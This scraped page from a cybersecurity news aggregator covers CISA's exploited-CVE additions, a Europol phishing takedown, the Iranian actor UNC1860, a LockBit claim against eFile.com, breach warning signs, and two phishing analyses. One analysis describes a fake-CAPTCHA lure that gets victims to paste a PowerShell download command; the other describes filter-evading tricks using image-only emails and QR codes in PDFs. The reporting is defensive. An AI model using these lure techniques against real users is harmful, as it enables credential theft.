Oktacron logo
Cyber security aggregate rss news

Cyber security aggregator - feeds history
image for 5 New Vulnerabilitie ...

 Cyber News

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added five new vulnerabilities to its Known Exploited Vulnerabilities Catalog, highlighting the continued threat that these security gaps pose to organizations worldwide. These vulnerabilities have been flagged due to active exploitation, making   show more ...

them critical targets for cybercriminals seeking to infiltrate and damage federal and private-sector systems alike. The vulnerabilities are identified as CVE-2024-27348 (Apache HugeGraph-Server Improper Access Control Vulnerability), CVE-2020-0618 (Microsoft SQL Server Reporting Services Remote Code Execution Vulnerability), CVE-2019-1069 (Microsoft Windows Task Scheduler Privilege Escalation Vulnerability), CVE-2022-21445 (Oracle JDeveloper Remote Code Execution Vulnerability), and CVE-2020-14644 (Oracle WebLogic Server Remote Code Execution Vulnerability). All five present significant risks and are actively being targeted by malicious actors, according to CISA’s evidence of exploitation. CISA's Known Exploited Vulnerabilities Catalog, which is updated regularly, highlights Common Vulnerabilities and Exposures (CVEs) that pose an immediate risk to organizations and their IT infrastructure. Each newly identified vulnerability, if left unaddressed, could lead to severe consequences such as unauthorized access, privilege escalation, and even remote code execution, potentially crippling networks, leaking sensitive information, or causing widespread operational disruptions. Breaking Down New Vulnerabilities 1. CVE-2024-27348: Apache HugeGraph-Server Improper Access Control Vulnerability Apache HugeGraph-Server, a graph database management system, suffers from an improper access control vulnerability that could allow remote attackers to execute arbitrary code on an affected server. The flaw stems from insufficient restrictions on access control mechanisms, opening a path for attackers to exploit the system remotely. Action Required: Organizations using Apache HugeGraph-Server should immediately apply the vendor-provided mitigations to patch this vulnerability. If no patch is available, discontinuing the use of this product is advised to avoid potential compromise. 2. CVE-2020-0618: Microsoft SQL Server Reporting Services Remote Code Execution Vulnerability This vulnerability affects Microsoft SQL Server Reporting Services, where a deserialization flaw allows an authenticated attacker to execute arbitrary code on the server. By improperly handling page requests, the service becomes vulnerable to remote code execution, placing the server’s data and functionality at risk. Action Required: Microsoft has issued guidance on how to mitigate this vulnerability. Organizations must promptly apply these mitigations to secure their systems. If mitigation isn't feasible, discontinuing use is the recommended course of action to protect the network from exploitation. 3. CVE-2019-1069: Microsoft Windows Task Scheduler Privilege Escalation Vulnerability Microsoft Windows Task Scheduler, a core system utility, contains a flaw in the SetJobFileSecurityByName() function, which could enable a local, authenticated attacker to gain elevated SYSTEM privileges. This elevation could provide the attacker with full control over the affected system, allowing for far-reaching malicious activities. Action Required: Organizations should implement Microsoft’s recommended patches or security updates. Failure to address this issue could leave the system open to severe privilege escalation, allowing attackers to execute commands with SYSTEM-level privileges. 4. CVE-2022-21445: Oracle JDeveloper Remote Code Execution Vulnerability A remote code execution vulnerability has been identified in Oracle JDeveloper, a popular development tool within Oracle's Fusion Middleware suite. The vulnerability lies within the ADF Faces component, which suffers from deserialization flaws. These weaknesses can be exploited remotely, potentially allowing attackers to execute malicious code without the need for authentication. Action Required: Oracle users should follow the recommended steps provided in Oracle’s advisory to mitigate this vulnerability. If mitigations are unavailable or ineffective, organizations should consider discontinuing the use of Oracle JDeveloper to prevent remote exploitation. 5. CVE-2020-14644: Oracle WebLogic Server Remote Code Execution Vulnerability Another critical vulnerability identified in Oracle’s Fusion Middleware suite affects the WebLogic Server. This remote code execution vulnerability allows attackers to exploit deserialization weaknesses, enabling unauthenticated remote access via T3 or IIOP protocols. This can lead to the compromise of the entire server. Action Required: Oracle has issued a patch for this vulnerability. Immediate application of this patch is essential for ensuring system security. As with the other vulnerabilities, if no patch or workaround is available, discontinuing the use of the product is strongly recommended to avoid an attack. A Call to Action for Federal Agencies and Beyond The addition of these vulnerabilities to the Known Exploited Vulnerabilities Catalog comes under CISA’s Binding Operational Directive (BOD) 22-01, which mandates that Federal Civilian Executive Branch (FCEB) agencies address and remediate these vulnerabilities by a set due date. This is part of an ongoing effort to protect federal networks from active cyber threats. Although BOD 22-01 specifically applies to FCEB agencies, CISA urges all organizations—both public and private—to adopt the same level of diligence. With the increasing sophistication of cyberattacks, organizations cannot afford to leave these vulnerabilities unpatched. Implementing timely remediation and incorporating vulnerability management practices are vital steps to protecting networks from exploitation. Understanding the Broader Impact of These Vulnerabilities Vulnerabilities like the ones listed above are often the most popular entry points for cybercriminals. Whether it’s through improper access controls, privilege escalation, or remote code execution, these security flaws present significant risks to any organization handling sensitive data or operating complex systems. If exploited, such vulnerabilities can result in: Data breaches: Leading to the exposure of sensitive or personal information. Operational disruptions: As attackers could seize control of servers, halt services, or demand ransoms. Reputational damage: Companies that fall victim to cyberattacks often suffer long-term damage to their reputation and customer trust. Legal and financial consequences: Non-compliance with security standards, such as failing to address known vulnerabilities, could result in heavy fines and legal action. The continued addition of vulnerabilities to CISA’s Known Exploited Vulnerabilities Catalog is a reminder of the importance of proactive cybersecurity measures. Organizations must prioritize remediation and keep their systems updated to prevent these threats from wreaking havoc on their networks.

image for Global Phishing Netw ...

 Cyber News

In an unprecedented move, Europol and Ameripol worked together to dismantle a phishing-as-a-service network affecting over 480,000 victims worldwide. The operation, dubbed "Operation Kaerb," targeted a criminal group that specialized in unlocking stolen mobile phones through phishing attacks. Investigators   show more ...

confirmed that over 1.2 million devices had been unlocked, with criminals primarily operating in Spain and Latin America. From September 10 to 17, law enforcement in Spain, Argentina, Chile, Colombia, Ecuador, and Peru executed a series of raids, resulting in 17 arrests and the seizure of 921 items, including mobile phones, vehicles, and even weapons. The man at the center of this operation, an Argentinian national, ran a phishing platform that had been active since 2018. He built a business on selling access to the platform to "unlockers"—criminals who provide phone unlocking services to those in possession of stolen mobile phones. Phishing-as-a-Service Model This wasn't just any phishing scheme. The platform operated as a phishing-as-a-service (PhaaS) model, offering easy access to low-skilled cybercriminals. "Unlockers" paid for access and additional features like phishing SMS and email templates. Phishing attacks generally involve tricking victims into giving up sensitive information by pretending to be a legitimate service. In this case, attackers targeted mobile phone owners who had activated "Lost Mode" on their devices. Victims, often from European and Latin American countries, received phishing messages urging them to provide credentials to regain access to their phones. The attack exploited the emotional vulnerability of the victims, making it easier for criminals to steal sensitive data. Once the credentials were in hand, criminals would unlock the phones, essentially wiping any connection to the legitimate owner. Europol and Ameripol's Role The international success of this operation can be credited to the cooperation between Europol’s European Cybercrime Centre (EC3) and Ameripol’s Specialized Cybercrime Centre. This marks the first joint operation between the two agencies, and it highlights the growing need for cross-border cybersecurity initiatives. Europol had been investigating the phishing network since 2022 after receiving intelligence from Group-IB, a cybersecurity firm. The organization worked closely with the affected countries, providing them with vital information and coordinating the operation from start to finish. During the week of the raids, Europol deployed experts to both Argentina and Spain, ensuring local authorities had the necessary support to take down the network. In coordination with Ameripol, law enforcement dismantled the infrastructure, seized the iServer domain used to host the phishing attacks, and apprehended the network's key players. How the Phishing Network Worked The phishing platform, called iServer, had been operational for over five years, primarily serving Spanish-speaking countries but expanding into Europe as well. What set iServer apart was its automation. Criminals didn't need advanced hacking skills to operate the platform. The web-based interface made it simple for users to create phishing pages and send malicious links via SMS. After the victim clicked the link, a "redirector" filtered out users who didn’t meet certain criteria. Those who passed were sent to a final phishing page disguised as a legitimate mobile service site. The platform collected login credentials, which the criminals then used to unlock the stolen phones. Unlockers were able to gather details like IMEI numbers, owner information, and even OTP (one-time passwords) to bypass security features like Lost Mode. Once unlocked, the phones could be resold without any trace of the original owner, effectively making it impossible for victims to recover their devices. Crimeware-as-a-Service: The New Threat Model The iServer platform is part of a larger trend known as "crimeware-as-a-service." These platforms lower the barrier to entry for cybercriminals by providing all the tools they need to commit digital crimes. PhaaS platforms like iServer make it easier for criminals with little technical skill to execute sophisticated phishing attacks. This is particularly concerning in regions like Latin America, where cybercrime is on the rise. By selling access to these platforms, individuals can profit without having to understand the technical side of phishing or hacking. It’s a growing concern for cybersecurity professionals as these platforms democratize access to high-impact cybercrime. Operation Kaerb has struck a significant blow to cybercriminals exploiting phishing-as-a-service models. Yet, as the cybersecurity landscape continues to evolve, new threats will emerge. The dismantling of the iServer platform represents a victory, but it’s just a step in a much larger fight. The global cybercrime ecosystem continues to grow, and with it, the need for ongoing vigilance from both the public and private sectors.

image for Iran’s Passive Bac ...

 Threat Intelligence News

UNC1860, an Iranian state-sponsored threat actor, has emerged as a formidable cyber force in the Middle East. Likely tied to Iran’s Ministry of Intelligence and Security (MOIS), UNC1860 group is known for its specialized tooling and passive backdoors, which enable long-term access to critical networks, including   show more ...

government and telecommunications sectors. Operating as an initial access provider, UNC1860 has displayed its ability to infiltrate high-priority networks across the region, aiding in espionage and cyberattacks. UNC1860’s Role in Iran's Cyber Campaigns Mandiant identifies UNC1860 as a key player in Iran’s cyber ecosystem, paralleling other Iranian groups such as Shrouded Snooper, Scarred Manticore, and Storm-0861. These actors have targeted Middle Eastern telecommunications and government networks, potentially collaborating on major disruptive operations, including Israel’s BABYWIPER attacks in 2023 and Albania’s ROADSWEEP campaign in 2022. Although direct involvement in these attacks by UNC1860 remains unverified, the group’s sophisticated malware controllers—TEMPLEPLAY and VIROGREEN—suggest its role as an initial access provider. These tools enable seamless hand-off operations, giving third-party actors remote access to victim networks, underlining UNC1860’s significance in Iran’s offensive cyber strategy. Tools of the Trade: UNC1860’s Specialized Arsenal UNC1860’s toolkit includes GUI-operated malware controllers and passive implants designed for stealth and persistence. One standout feature is a Windows kernel mode driver repurposed from an Iranian antivirus software filter. This reflects the group’s reverse engineering expertise and ability to evade detection. By exploiting vulnerabilities in internet-facing servers, UNC1860 establishes initial footholds in target networks, deploying utilities and implants to evade detection. Their arsenal includes passive implants like OATBOAT and TOFUDRV, which avoid traditional command-and-control infrastructure, making detection by security teams difficult. These implants leverage HTTPS encryption and use undocumented Input/Output Control commands, ensuring secure and covert communications. UNC1860 and APT34: A Cooperative Threat Mandiant’s investigations suggest a close overlap between UNC1860 and APT34, another MOIS-linked threat actor. APT34, also known as Cobalt Gypsy, Hazel Sandstorm, Helix Kitten, etc., is known to carry out supply chain attacks, using social engineering and recently patched vulnerabilities for attacks, explained researchers at Cyble Research and Intelligence Labs. APT34 relies on custom DNS Tunneling protocols for command and control and data exfiltration, along with web-shells and backdoors for persistent access to servers. Cutting Kitten employs stolen account credentials for lateral movement and uses phishing sites to harvest credentials for accessing targeted organizations, Cyble added. Both groups have been observed operating within the same victim environments, possibly sharing tools and access, Mandiant said. In multiple engagements between 2019 and 2020, organizations compromised by APT34 were later found to have been infiltrated by UNC1860, suggesting a coordinated approach to cyber espionage and lateral movement across networks. This collaboration is further evidenced by both groups' pivot to Iraq-based targets, highlighting their flexible and opportunistic nature. UNC1860’s use of web shells and droppers, including STAYSHANTE and SASHEYAWAY, allows for the smooth execution of their more advanced malware, which can be handed off to third-party actors for further exploitation. [caption id="attachment_90205" align="aligncenter" width="600"] Illustration of collaborator actor's command and control (C2 or C&C) used to utilize existing UNC1860 implant infrastructure in compromised network (Source: Google-owned Mandiant)[/caption] TEMPLEPLAY and VIROGREEN: UNC1860’s Custom Controllers UNC1860’s malware controllers TEMPLEPLAY and VIROGREEN offer advanced post-exploitation capabilities. TEMPLEPLAY, a .NET-based controller for the TEMPLEDOOR backdoor, allows operators to execute commands, upload and download files, and establish HTTP proxies to bypass network boundaries. Its user-friendly GUI provides third-party operators with easy access to infected machines, facilitating remote desktop connections and internal network scanning. VIROGREEN, meanwhile, is designed to exploit vulnerable SharePoint servers using CVE-2019-0604. It includes functions for deploying backdoors like STAYSHANTE and BASEWALK, scanning for vulnerabilities, and controlling compromised systems. Together, these controllers represent a significant part of UNC1860’s toolkit, enabling them to maintain persistent access and facilitate further attacks. Passive Backdoors: UNC1860’s Stealthy Persistence One of UNC1860’s key strengths lies in its passive implants, which offer stealth and persistence in victim environments. These implants, including TOFUDRV and TEMPLEDROP, provide advanced evasion techniques by leveraging the Windows kernel. By avoiding outbound traffic and initiating communications from volatile sources, these implants make network monitoring exceedingly difficult. Their ability to function without traditional command-and-control infrastructure further complicates detection efforts. UNC1860’s malware development includes custom Base64 encoding/decoding and XOR encryption/decryption methods. These custom libraries allow the group to bypass standard detection mechanisms and ensure compatibility across different .NET versions. By implementing these functions independently, UNC1860 demonstrates its deep understanding of Windows internals and its commitment to avoiding detection. Long-Term Persistence: UNC1860’s Main-Stage Backdoors UNC1860’s foothold utilities and backdoors are designed for long-term persistence, using obfuscation methods to evade detection. Their “main-stage” implants, including TEMPLEDOOR, further extend their operational security by providing robust footholds in victim environments. These backdoors are often reserved for high-priority targets, particularly in the telecommunications sector, and demonstrate UNC1860’s advanced capabilities in reverse engineering and defense evasion. Conclusion: UNC1860’s Growing Influence As cyber tensions rise in the Middle East, UNC1860’s role as an initial access provider and persistent threat actor continues to grow. Their sophisticated tooling and ability to gain and maintain access to high-value networks make them a significant player in Iran’s cyber operations. With deep expertise in reverse engineering and stealth, UNC1860 is likely to remain a critical asset in Iran’s cyber arsenal, capable of adapting to evolving objectives and shifting geopolitical landscapes. UNC1860’s continued operations signal the growing complexity of state-sponsored cyber threats, particularly in the Middle East. Network defenders in the region must remain vigilant, as UNC1860’s advanced tradecraft and evasive techniques present a persistent challenge to cybersecurity efforts.

image for U.S. Taxpayer Data a ...

 Cyber News

Sensitive tax information of citizens in the U.S. could potentially be stolen after the notorious LockBit ransomware group has claimed responsibility for ransoming eFile.com, a well-known Internal Revenue Service (IRS) authorized online tax-filing service. This breach, similar to a previous malware incident from   show more ...

earlier in 2023, raises concerns about the cybersecurity measures in place at critical financial service providers. Background of the eFile Attack Lockbit claimed efile.com as one of its victims in its dark web post on September 18, 2024. AI-powered threat intelligence platform Cyble‘s researchers told The Cyber Express that LockBit did not post any documents – a process commonly followed by ransomware crooks as a proof of compromise. [caption id="attachment_90172" align="aligncenter" width="414"] Source: X[/caption] Currently, details regarding the extent of the Lockbit ransomware attack, data compromised, and the motive behind the cyber assault remain undisclosed but, the group has set a deadline of 14 days to leak the compromised data. Despite the claims made by Lockbit, the official website of the company remain fully functional. This discrepancy has raised doubts about the authenticity of the threat actor’s assertion. To ascertain the veracity of the claims, The Cyber Express has reached out to the eFile officials. As of writing of this news report, no response has been received, leaving the ransomware attack claim unverified. Understanding the efile Attack in 2023 According to Dr. Johannes Ullrich, Dean of Research for SANS Technology Institute who reports cybersecurity related content, efile.com site was found to be serving malicious JavaScript that redirected users to download malware. Named "efail" by researchers, this malware exploited a vulnerability within the tax-filing platform, potentially allowing criminals to access a treasure trove of sensitive data including social security numbers, home addresses, income information, and other personal details. [caption id="attachment_90174" align="alignnone" width="1111"] The bug unintentionally downloaded by users in 2023. Source: Sans Internet Storm Center[/caption] In that case, the malware operated by rerouting users to a corrupted third-party site where the malicious code was downloaded. The breach highlighted a significant vulnerability in the supply chain, as users visiting the official eFile.com site were being victimized without engaging in any unsafe browsing behavior. After Ulrich’s report, eFile removed the malware days later and reassured users that the site was safe. It appears that LockBit’s new claim may suggest ongoing security flaws or insufficient patching. LockBit Ransomware Allegedly Targeted eFile Back in 2022 This is not the first instance that efile has fallen victim to a ransomware attack. Lockbit had claimed to have compromised eFile.com on January 19, 2022. The ransomware group has now asserted to have compromised the site again, which could have far more devastating consequences. The crucial aspect of this attack is the timing which comes just before the October filing deadline for U.S. taxpayers who requested extensions. This is an indication that cybercriminals are intentionally targeting moments of peak traffic to maximize the impact of their breaches. LockBit’s Growing List of Targets LockBit has been relentless in its attacks on major institutions. The ransomware gang, even amid global law enforcement crackdowns, remains one of the most prolific cybercriminal groups in operation. The group accounts for about 8% of ransomware infections worldwide. The breach at eFile.com fits within LockBit’s modus operandi, which focuses on high-value targets that house a wealth of sensitive data. The financial and government sectors have long been prime targets for ransomware gangs, largely because the data they hold is highly sensitive, and the consequences of a breach can be far-reaching, impacting millions of people. Consequences for eFile.com Users For the millions of users who rely on eFile.com to file their taxes, the potential consequences are dire. If LockBit's claim proves true, taxpayers' personal and financial data may be in the hands of criminals. This data could be used for a variety of nefarious activities, including identity theft, tax fraud, and account takeovers. The breach at eFile.com is a stark reminder of the need for robust cybersecurity measures, particularly for companies that deal with large amounts of personal information. Stronger oversight of third-party vendors, improved endpoint security, and constant vigilance through security audits are all necessary to protect against evolving threats. As LockBit continues its reign of ransomware attacks, companies must rethink their cybersecurity protocols.

image for 10 Critical Indicato ...

 Firewall Daily

Data breaches have emerged as one of the most dreaded threats for organizations of all sizes. As businesses increasingly store and process vast amounts of sensitive data electronically, the importance of safeguarding this information has never been greater. Yet, many companies overlook critical warning signs, leaving   show more ...

themselves vulnerable to cyber-attacks that can lead to devastating breaches—resulting in financial loss, reputational damage, and legal repercussions. In a world where cyber threats are constantly evolving, no business is immune. The difference between preventing a breach and falling victim to one often lies in early detection and swift, proactive action. This article highlights ten key warning signs that your business may be on the brink of a data leak and offers practical steps to minimize these risks before serious harm is done. Steps to Minimize Data Breach Risks 1. Outdated Software or Systems One of the most glaring red flags for data breaches is running outdated software or systems. Many organizations fail to update their operating systems, applications, and security patches in a timely manner, leaving them vulnerable to exploitation. Older systems often contain well-known security flaws that hackers can easily target. Updates and patches are released precisely because cybersecurity experts identify critical vulnerabilities. Ignoring these updates places companies at risk of falling prey to known attack methods. Even if your organization uses firewalls or antivirus software, outdated systems can still serve as a weak link, providing attackers with an entry point. Additionally, legacy systems may not be compatible with modern security tools, further amplifying the risk. Businesses that delay updating their systems are prime targets for ransomware attacks, data theft, or even full-scale network compromises. Implementing automated patching as part of a structured approach to software updates is crucial for mitigating these risks and maintaining a strong security posture. 2. Weak or Reused Passwords Weak or reused passwords are a significant threat to your company's data security. Hackers can easily exploit such vulnerabilities through brute-force attacks or credential stuffing, where they use password lists from previous breaches to gain unauthorized access. Reusing passwords across multiple platforms magnifies the risk—once one account is compromised, the same credentials can be used to infiltrate other systems, including corporate networks, cloud services, and financial accounts. Moreover, weak passwords are often predictable, making them easier for hackers to guess or crack. To mitigate this, it's crucial to implement long, complex, and unique passwords for each system. Strong password policies, coupled with two-factor authentication (2FA), are essential in preventing unauthorized access. Allowing weak or reused passwords exposes the entire network to potential breaches, turning compromised credentials into a doorway for cybercriminals and setting the stage for a data breach disaster. 3. Insufficient Employee Security Awareness Human error is often the weakest link in cybersecurity, and a lack of employee security awareness training is a significant indicator that your company may be vulnerable to data breaches. Cyber attackers frequently exploit this vulnerability through phishing, social engineering, and credential theft. Employees who are not trained to recognize phishing attempts or understand the importance of strong passwords may inadvertently expose sensitive data. Security awareness training equips employees with the knowledge to identify potential threats, report suspicious activity, and adhere to best practices, such as enabling two-factor authentication. It is crucial that employees are educated on proper data handling procedures and the necessary steps to take in the event of a security incident. Without regular and updated training on emerging threats, your organization remains at high risk of data breaches. An informed and vigilant staff is a cornerstone of a robust cybersecurity strategy. 4. Absence of an Incident Response Plan A very clear red flag indicating that a company has not prepared for a possible data breach is the absence of a written IRP. An IRP spells out the procedures needed to identify a security incident; contain the damage, if any; mitigate the situation, and recover from the incident. Because of the absence of structured planning, breach detection and response in most organizations have experienced delays, leading to prolonged exposure, increased damage, and higher recovery costs. The reasons can also be attributed to the lack of an IRP wherein employees are confused with the inefficiency in communicating and containing strategies. A proper IRP would include well-defined roles and responsibilities, communication strategies on how stakeholders should be informed, and analysis procedures for the breach to ensure that similar incidents are avoided in the future. Such an IRP can also be tested and updated routinely in order to make sure the plan actually works. Organizations without an IRP take quite a while longer to respond to the breach; an attacker is thus given extra hours to play in their systems, causing much graver data loss. 5. Inconsistent or Non-existent Data Backup Practices Inconsistent or non-existent data backup practices are major indicators of vulnerability to potential data breaches or ransomware attacks. Organizations that lack regular backups risk losing critical data in the event of a breach, hardware failure, or other cyber incidents. Ransomware, in particular, can encrypt an organization's files, rendering them unusable until the ransom is paid. Companies without robust backup solutions may find themselves compelled to pay ransoms. Regular, encrypted backups provide a safeguard against such attacks, allowing organizations to recover without succumbing to ransom demands. Backups should be securely stored both offsite and, in the cloud, to ensure accessibility in case of a network-wide breach or disaster. Without a sound backup strategy, even minor breaches can lead to catastrophic data loss. 6. Outdated or Non-existent Firewall Protection  Firewall protection serves as a crucial barrier between your internal network and potential external threats. An outdated or non-existent firewall is a significant red flag. In today’s sophisticated cyber threat landscape, outdated firewalls offer minimal protection against advanced threats like zero-day exploits and DDoS attacks. Additionally, improperly configured firewalls can leave unnecessary ports or services open, providing attackers with easy access. Proper firewall management is essential to secure your network perimeter and filter out malicious traffic. An up-to-date and correctly configured firewall is vital to protect sensitive areas of your network from unauthorized access. Organizations with inadequate firewall protection are significantly more susceptible to hacks and data breaches. 7. Lack of Network Monitoring A critical warning sign of impending data breaches is the absence of real-time network monitoring. Many cyber-attacks can go undetected for weeks or even months, during which attackers can steal sensitive information or deploy malware. Without network monitoring, companies may remain unaware of unauthorized access, data exfiltration, or other malicious activities until it’s too late. Network monitoring tools can detect unusual behaviors, such as large data transfers, access from unfamiliar IP addresses, and attempts to breach firewalls. Proactive monitoring also helps identify insider threats, whether intentional or inadvertent. Without effective monitoring, organizations are vulnerable to undetected lateral movements by attackers, increasing the risk of sensitive data theft. 8. Uncontrolled Access to Sensitive Data Uncontrolled or poorly managed access to sensitive data is another major risk factor. When employees have access to data or systems beyond their functional requirements, it creates opportunities for accidental or malicious breaches. For instance, a sales representative should not have access to human resources or financial records. Adopting the Principle of Least Privilege (POLP) and granting only the necessary access levels can significantly reduce breach risks. Additionally, failing to regularly review and update access controls can allow former employees or contractors to retain access to critical systems. Implementing role-based access control (RBAC) and conducting regular audits ensure that only authorized personnel have access to sensitive information, minimizing the risk of insider threats and data breaches. 9. Lack of Data Encryption The absence of data encryption during transmission and storage is a significant vulnerability. Encryption ensures that even if hackers intercept or access files, they cannot read the contents without the proper decryption keys. Many organizations focus solely on encrypting data in transit but neglect encryption for data at rest, leaving customer records, financial information, and proprietary data exposed. Unsecured endpoints, such as laptops, smartphones, or portable drives, are more prone to theft or loss. Without encryption, these devices can become sources of data breaches. Organizations must implement robust encryption protocols for both data in transit and at rest to protect against severe cybersecurity risks and prevent the exposure of sensitive information. 10. Failure to Adhere to Data Protection Regulations Non-compliance with data protection regulations, such as GDPR or HIPAA, is a major indicator of potential data breach risks. Adhering to regulations on handling, storing, and protecting sensitive information is crucial. Non-compliance not only increases the likelihood of a breach but also results in significant legal and financial consequences. Weak internal policies, inadequate data protection strategies, and insufficient investment in cybersecurity infrastructure often contribute to non-compliance. Regular audits and policy reviews are essential to ensure adherence to regulations and maintain robust protection measures. Failure to comply with data protection laws exposes organizations to both cyber threats and severe legal repercussions, impacting reputation and financial stability. By addressing these key areas, businesses can fortify their defenses and mitigate the risks of devastating data breaches. In today’s rapidly evolving cyber landscape, taking decisive action now can prevent potentially catastrophic consequences and ensure the long-term security and resilience of your organization.

image for Spearphishing tricks ...

 Business

The trend of using spearphishing techniques in mass emails continues to gain momentum. We recently came across a sample email in which attackers used a whole box of relatively sophisticated spearphishing tricks. Now, one might think that use of such tactics for a mere mass phishing attack would be somewhat OTT in   show more ...

terms of effort on the attackers side; not so – it transpired in this case: the attackers still gave it a shot (though detailed analysis reveals the attack was doomed from the start). In any case, it presented us with an excellent opportunity to take a dive into the techniques employed by phishers. Email mimicking update of corporate guidelines Almost everything about the email is spot on. Its addressed to a specific individual within a specific organization, and uses ghost spoofing for the senders name — that is, the From field displays a forgery of the legitimate address of the target company (which, of course, has no relation to the address in the Reply To field). The email is sent through the infrastructure of a reputable marketing company, raising no red flags with email filters. Whats more, the name of this company and the top-level domain hosting its website are deliberately chosen to lull the recipients vigilance — the websites based in Indonesia, and the victim may well perceive the .id domain as an abbreviation for identifier rather than a country code. Alongside the spoofed address in the From field, it looks convincing enough: Email mimicking update of corporate guidelines. But thats not all. In the email body theres practically zero text — only a copyright line and an unsubscribe link (both of which, as it happens, are inserted by the mail engine of the legitimate company used to send the message). Everything else, including the recipients name, is an image. This is to prevent anti-phishing mechanisms from applying text-based filtering rules. An attached PDF file is used instead of a direct phishing link for the same reason. Websites can easily be blacklisted and blocked at the mail-server level. A PDF file, on the other hand, appears as a completely legitimate attachment. PDF attachment In actual fact, attackers have long been concealing links in PDF files. Thus, in theory, security software should be able to analyze a PDF — including any text and links within. But the creators of this phishing campaign were wise to that as well. Their PDF technically has no text or links in it whatsoever. Instead, it presents another image featuring a QR code and embedded accompanying text. Contents of the attached PDF file: the QR code contains a malicious link. In addition, the PDF mimics the interface of DocuSign, a well-known service used for electronic document management. DocuSign does indeed allow you to send documents for signing, and to track their status. But, of course, it has nothing to do with PDF files housing a QR code. At this point, it becomes painfully obvious that the attackers overcooked the attack. The victim receives what seems to be confidential corporate guidelines by email, but to read them they need to scan a QR code with a mobile phone — not exactly realistic. Most employees wont bother — especially if they use their own (non-corporate) phone. Epic fail: the phishing website So what happens if the victim does pull out their phone and scan the code? Well, for starters, theyll be greeted by Cloudflares verification system and asked to prove theyre human. Cloudflare is a legitimate service to guard against DDoS attacks, and cybercriminals like to put their phishing pages behind it to add plausibility. But after that its a disaster. The website plays an animation of an envelope opening, then crashes with an error message. Phishing site that appears to have an overdue bill, It appears the attackers forgot to renew their subscription to the hosting services. Maybe the site had some more kooky tricks in store for the victim, but by the time the phishing emails were being pumped out, it was already defunct. How to stay safe To protect company employees from phishing: Secure corporate email at the mail-gateway level. Use local security solutions with anti-phishing technologies on all work devices (including mobile ones). Inform employees of the latest phishing tricks (for example, by pointing them toward our posts regarding signs of phishing). Hold regular cybersecurity awareness training for staff.

image for This Windows PowerSh ...

 A Little Sunshine

Many GitHub users this week received a novel phishing email warning of critical security holes in their code. Those who clicked the link for details were asked to distinguish themselves from bots by pressing a combination of keyboard keys that causes Microsoft Windows to download password-stealing malware. While   show more ...

it’s unlikely that many programmers fell for this scam, it’s notable because less targeted versions of it are likely to be far more successful against the average Windows user. A reader named Chris shared an email he received this week that spoofed GitHub’s security team and warned: “Hey there! We have detected a security vulnerability in your repository. Please contact us at https://github-scanner[.]com to get more information on how to fix this issue.” Visiting that link generates a web page that asks the visitor to “Verify You Are Human” by solving an unusual CAPTCHA. This malware attack pretends to be a CAPTCHA intended to separate humans from bots. Clicking the “I’m not a robot” button generates a pop-up message asking the user to take three sequential steps to prove their humanity. Step 1 involves simultaneously pressing the keyboard key with the Windows icon and the letter “R,” which opens a Windows “Run” prompt that will execute any specified program that is already installed on the system. Executing this series of keypresses prompts the built-in Windows Powershell to download password-stealing malware. Step 2 asks the user to press the “Control” key and the letter “V” at the same time, which pastes malicious code from the site’s virtual clipboard. Step 3 — pressing the “Enter” key — causes Windows to launch a PowerShell command, and then fetch and execute a malicious file from github-scanner[.]com called “l6e.exe.” PowerShell is a powerful, cross-platform automation tool built into Windows that is designed to make it simpler for administrators to automate tasks on a PC or across multiple computers on the same network. According to an analysis at the malware scanning service Virustotal.com, the malicious file downloaded by the pasted text is called Lumma Stealer, and it’s designed to snarf any credentials stored on the victim’s PC. This phishing campaign may not have fooled many programmers, who no doubt natively understand that pressing the Windows and “R” keys will open up a “Run” prompt, or that Ctrl-V will dump the contents of the clipboard. But I bet the same approach would work just fine to trick some of my less tech-savvy friends and relatives into running malware on their PCs. I’d also bet none of these people have ever heard of PowerShell, let alone had occasion to intentionally launch a PowerShell terminal. Given those realities, it would be nice if there were a simple way to disable or at least heavily restrict PowerShell for normal end users for whom it could become more of a liability. However, Microsoft strongly advises against nixing PowerShell because some core system processes and tasks may not function properly without it. What’s more, doing so requires tinkering with sensitive settings in the Windows registry, which can be a dicey undertaking even for the learned. Still, it wouldn’t hurt to share this article with the Windows users in your life who fit the less-savvy profile. Because this particular scam has a great deal of room for growth and creativity.

 Computer, Internet Security

Snowflake, a cloud-based data warehousing platform, has implemented default multifactor authentication and a minimum 14-character password requirement following cyberattacks in June affecting multiple customers.

 Malware and Vulnerabilities

Microsoft has confirmed CVE-2024-37985 as a zero-day bug in Windows with a CVSS score of 5.9. It is a Windows Kernel information disclosure vulnerability, allowing attackers to access heap memory from a privileged process on a vulnerable server.

 Feed

Red Hat Security Advisory 2024-6843-03 - An update for pcp is now available for Red Hat Enterprise Linux 8.6 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.6 Update Services for SAP Solutions, and Red Hat Enterprise Linux 8.6 Telecommunications Update Service. Issues addressed include a heap corruption vulnerability.

 Feed

Red Hat Security Advisory 2024-6842-03 - An update for pcp is now available for Red Hat Enterprise Linux 8.4 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.4 Update Services for SAP Solutions, and Red Hat Enterprise Linux 8.4 Telecommunications Update Service. Issues addressed include a heap corruption vulnerability.

 Feed

Red Hat Security Advisory 2024-6755-03 - Updated images that fix several bugs are now available for Red Hat OpenShift Data Foundation 4.16.2 on Red Hat Enterprise Linux 9 from Red Hat Container Registry.

 Feed

Red Hat Security Advisory 2024-6753-03 - An update for kernel is now available for Red Hat Enterprise Linux 8.6 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.6 Update Services for SAP Solutions, and Red Hat Enterprise Linux 8.6 Telecommunications Update Service. Issues addressed include double free and out of bounds read vulnerabilities.

 Feed

Ubuntu Security Notice 7025-1 - It was discovered that LibreOffice would incorrectly handle digital signature verification after repairing a corrupted document. A remote attacker could possibly use this issue to forge valid signatures.

 Feed

GitLab has released patches to address a critical flaw impacting Community Edition (CE) and Enterprise Edition (EE) that could result in an authentication bypass. The vulnerability is rooted in the ruby-saml library (CVE-2024-45409, CVSS score: 10.0), which could allow an attacker to log in as an arbitrary user within the vulnerable system. It was addressed by the maintainers last week. The

 Feed

Cybersecurity in healthcare has never been more urgent. As the most vulnerable industry and largest target for cybercriminals, healthcare is facing an increasing wave of cyberattacks. When a hospital's systems are held hostage by ransomware, it’s not just data at risk — it’s the care of patients who depend on life-saving treatments. Imagine an attack that forces emergency care to halt, surgeries

 Feed

